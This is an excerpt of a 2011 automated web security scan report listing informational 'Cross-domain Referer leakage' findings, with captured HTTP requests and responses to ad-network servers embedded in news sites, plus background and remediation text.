Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 110282
Expires: Sun, 04 Sep 2011 01:00:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:00:13 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://ogp.me/ns#">

...[SNIP]...
</p>


<form action="http://gallery.pictopia.com/ap/requests/" method="post" name="ThatsRacin2 IMAGEMEDIA110829201332211964" target="_blank">
<input type="hidden" name="prefill" value="1"/>
...[SNIP]...

20. Cross-domain Referer leakage
There are 30 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


20.1. http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/CSTV.ND/SPORTS.MFOOTBL.BODY

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /adj/CSTV.ND/SPORTS.MFOOTBL.BODY;sect=mfootbl;pos=story;sz=300x250;tile=1;ord=4556314295623451? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 400
Date: Sun, 04 Sep 2011 00:43:25 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/t;237761630;0-0;0;13655887;4307-300/250;41051265/41069052/1;;~aopt=2/0/ff/0;~sscs=%3fhttp://notredame-hospitality.cbscollegestore.com/store.cfm?dept_id=17785&store_id=468&partner_id=18081"><img src="http://s0.2mdn.net/viewad/1271867/nd_hosp-030711-300.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

20.2. http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/CSTV.ND/SPORTS.MFOOTBL.BODY

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /adj/CSTV.ND/SPORTS.MFOOTBL.BODY;sect=mfootbl;pos=bot;sz=728x90;tile=2;ord=4556314295623451? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 316
Date: Sun, 04 Sep 2011 00:43:40 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/c;235049696;0-0;0;13655887;3454-728/90;40293483/40311270/1;;~aopt=2/0/ff/0;~sscs=%3fhttp://und.cstvauctions.com/gallery.cfm"><img src="http://s0.2mdn.net/viewad/1271868/nd_auct-011211-728.gif" border=0 alt="Bid Now!"></a>
...[SNIP]...

20.3. http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/CSTV.ND/SPORTS.MFOOTBL.BODY

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /adj/CSTV.ND/SPORTS.MFOOTBL.BODY;sect=mfootbl;pos=top;sz=728x90;tile=3;dcopt=ist;ord=4556314295623451? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 399
Date: Sun, 04 Sep 2011 00:43:44 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/k;237761631;0-0;0;13655887;3454-728/90;41051266/41069053/1;;~aopt=2/0/ff/0;~sscs=%3fhttp://notredame-hospitality.cbscollegestore.com/store.cfm?dept_id=17785&store_id=468&partner_id=18082"><img src="http://s0.2mdn.net/viewad/1271867/nd_hosp-030711-728.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

20.4. http://ad.doubleclick.net/adj/mi.clt00/Sports

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mi.clt00/Sports

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /adj/mi.clt00/Sports;atf=Y;dcove=d;pl=story;sect=SportsSportsHoldSports;pos=1;sz=100x25;tile=2;!c=news;pub=CharlotteObserver2;ord=791353263858316;gender=;year=;income=? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 323
Date: Sun, 04 Sep 2011 00:44:09 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/o;244071137;0-0;1;34538914;1548-100/25;43034600/43052387/1;;~sscs=%3fhttp://charlotte.dealsaver.com"><img src="http://s0.2mdn.net/viewad/827661/CLT_DealSaverPromo_100x25_070811.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

20.5. http://ad.doubleclick.net/adj/mi.clt00/Sports

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mi.clt00/Sports

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /adj/mi.clt00/Sports;atf=Y;dcove=d;pl=story;sect=SportsSportsHoldSports;pos=1;sz=300x100;tile=3;!c=news;pub=CharlotteObserver2;ord=791353263858316;gender=;year=;income=? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 245
Date: Sun, 04 Sep 2011 00:44:11 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/m;44306;0-0;0;34538914;3823-300/100;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

20.6. http://ad.doubleclick.net/adj/mi.sac00/Lifestyle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mi.sac00/Lifestyle

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /adj/mi.sac00/Lifestyle;dcove=d;pl=story;lvl6=WireLifestyle;loc=ats;pos=1;reg=0;sz=100x25;tile=2;ord=5715951826423407? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 246
Date: Sun, 04 Sep 2011 00:44:15 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/v;44306;0-0;0;17382208;1548-100/25;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

20.7. http://ad.doubleclick.net/adj/mi.sac00/Lifestyle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mi.sac00/Lifestyle

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /adj/mi.sac00/Lifestyle;dcove=d;pl=story;lvl6=WireLifestyle;loc=bts;pos=1;reg=0;sz=300x100;tile=4;ord=5715951826423407? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 352
Date: Sun, 04 Sep 2011 00:44:46 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/l;236915174;6-0;0;17382208;3823-300/100;39717452/39735239/1;;~sscs=%3fhttp://findnsave.sacbee.com/%5b%5bHASH%5d%5dadlink=fns"><img src="http://s0.2mdn.net/viewad/1498419/101203_promo_300x100_neverknowguy.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

20.8. http://admeld.adnxs.com/usersync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /usersync?calltype=admeld&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; sess=1; uuid2=6422714091563403120; anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZV2FP?n>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3I*!2a3C06.$K

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:01:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:01:36 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Sun, 04 Sep 2011 01:01:36 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=6422714091563403120&expiration=0" width="0" height="0"/>');

20.9. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliates.eblastengine.com
Path:   /Widgets/EmailSignup.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /Widgets/EmailSignup.aspx?wcguid=29DFC999-F0F3-482A-9516-C8414B36C6AD&height=100&width=275 HTTP/1.1
Host: affiliates.eblastengine.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=28
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Sep 2011 01:02:47 GMT
Last-Modified: Sun, 04 Sep 2011 01:01:47 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sun, 04 Sep 2011 01:02:18 GMT
Content-Length: 6773


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Email S
...[SNIP]...
</title>
<link rel="stylesheet" href="//affiliates.upickem.net/shared/includes/UpickemFrontEngine.css" type="text/css" />
<link rel="stylesheet" href="//affiliates.upickem.net/shared/includes/SkinLight.css" type="text/css" />
<link rel="stylesheet" href="//eblastengine.upickem.net/EBlastEngine.css" type="text/css" />
<link rel="shortcut icon" href="Images/favicon.ico" type="image/x-icon"/>
...[SNIP]...

20.10. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88303-3335-5

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /ad/js/13966-88303-3335-5?mpt=1119678&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/x%3B245665919%3B0-0%3B1%3B43087964%3B3454-728/90%3B43451397/43469184/1%3B%3B%7Eokv%3D%3Btype%3Dleaderboard%3Bsz%3D728x90%3Btile%3D1%3Bvbc%3Dcfa%3BarticleID%3DUSTRE78222D20110903%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 517
Date: Sun, 04 Sep 2011 00:45:20 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/x;245665919;0-0;1;43087964;3454-728/90;43451397/43469184/1;;~okv=;type=leaderboard;sz=728x90;tile=1;vbc=cfa;articleID=USTRE78222D20110903;~aopt=6/1/ff/1;~sscs=?http://altfarm.mediaplex.com/ad/ck/13966-88303-3335-5?mpt=1119678"><img ismap border=0 src="http://img-cdn.mediaplex.com/0/13966/gift-v2-st-728x90.gif" ></a><script language="JavaScript" src="http://js.c12s.com/ant-cf.js?0_740_139668830333355_0_53_100004"></script>
...[SNIP]...

20.11. http://anrtx.tacoda.net/rtx/r.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://anrtx.tacoda.net
Path:   /rtx/r.js

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /rtx/r.js?cmd=LCN&si=17778&pi=-&xs=3&pu=http%253A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html%253Fifu%253Dhttp%25253A//www.google.com/trends/hottrends%25253Fq%25253Dsprint%252526date%25253D2011-9-3%252526sa%25253DX&df=1&v=6.0&cb=85182 HTTP/1.1
Host: anrtx.tacoda.net
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 01:06:39 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Set-Cookie: mig=3; path=/; expires=Tue, 13-Dec-11 01:06:39 GMT; domain=anrtx.tacoda.net
Location: http://tacoda.at.atwola.com/rtx/r.js?cmd=LCN&si=17778&pi=-&xs=3&pu=http%253A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html%253Fifu%253Dhttp%25253A//www.google.com/trends/hottrends%25253Fq%25253Dsprint%252526date%25253D2011-9-3%252526sa%25253DX&df=1&v=6.0&cb=85182&tid=&mig=3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 596

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://tacoda.at.atwola.com/rtx/r.js?cmd=LCN&amp;si=17778&amp;pi=-&amp;xs=3&amp;pu=http%253A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html%253Fifu%253Dhttp%25253A//www.google.com/trends/hottrends%25253Fq%25253Dsprint%252526date%25253D2011-9-3%252526sa%25253DX&amp;df=1&amp;v=6.0&amp;cb=85182&amp;tid=&amp;mig=3">here</A>
...[SNIP]...

20.12. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /pixel?nid=audsci HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 302 Found
Location: http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEOfruwaKEzWGvrIKzVwqd-c&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 341
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEOfruwaKEzWGvrIKzVwqd-c&amp;cver=1">here</A>
...[SNIP]...

20.13. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /pixel?google_nid=rubicon&google_cm&google_sc HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 302 Found
Location: http://pixel.rubiconproject.com/tap.php?v=7751&nid=2249&expires=30&put=CAESEGMUSetziKiEuzwBhcLJxAU&google_cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:44:14 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 325
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://pixel.rubiconproject.com/tap.php?v=7751&amp;nid=2249&amp;expires=30&amp;put=CAESEGMUSetziKiEuzwBhcLJxAU&amp;google_cver=1">here</A>
...[SNIP]...

20.14. http://cm.npc-mcclatchy.overture.com/js_1_0/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /js_1_0/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /js_1_0/?config=1001507650&type=lifestyle&ctxtId=lifestyle&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&ctxtCat=lifestyle&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097138735&ctxtContent=%3Chead%3E%0A%20%0A%0A%0A%0A%0A%0A%0A%0A%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20language%3D%22JavaScript%22%3E%0A%3C!--%20%0Avar%20gomez%3D%7B%20%0A%09gs%3A%20new%20Date().getTime()%2C%20%0A%09acctId%3A'D3FD89'%2C%20%0A%09pgId%3A'story-detail'%2C%20%0A%09grpId%3A'Sacbee'%20%0A%7D%3B%0A%0A%0A%2F*Gomez%20tag%20version%3A%207.0*%2Fvar%20gomez%3Dgomez%3Fgomez%3A%7B%7D%3Bgomez.h3%3Dfunction(d%2C%20s)%7Bfor(var%20p%20in%20s)%7Bd%5Bp%5D%3Ds%5Bp%5D%3B%7Dreturn%20d%3B%7D%3Bgomez.h3(gomez%2C%7Bb3%3Afunction(r)%7Bif(r%3C%3D0)return%20false%3Breturn%20Math.random()%3C%3Dr%26%26r%3B%7D%2Cb0 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:20:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyMDIwMzSzMACx5Mjgw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:20:48 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
</title>

<link rel="stylesheet" href="http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css" type="text/css">
<style type="text/css">
...[SNIP]...
<div style="overflow:hidden; height:14px;"><a href="http://info.yahoo.com/services/us/yahoo/ads/details.html" target="_blank" class="title">Ads by Yahoo!</a>
...[SNIP]...

20.15. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/778079/0/-1/ADTECH

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /addyn/3.0/5111.1/778079/0/-1/ADTECH;alias=content.usatoday.com/communities/campusrivalry_Bottom728x90;cookie=info;loc=100;target=_blank;grp=38840;misc=1315096975888;noperf=1;size=728x90;key=Blog+Stay+updated+Oregon-LSU+other+college+football+action;kvtitle=Blog-Stay-updated-on-Oregon-LSU-and-other-college-football-action HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
